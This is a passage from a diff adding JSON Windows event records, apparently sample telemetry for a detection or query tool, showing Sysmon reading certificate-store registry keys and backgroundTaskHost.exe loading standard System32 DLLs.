"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "backgroundTaskHost.exe", + "image_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689180000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689330000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571689650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689650000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689800000, + 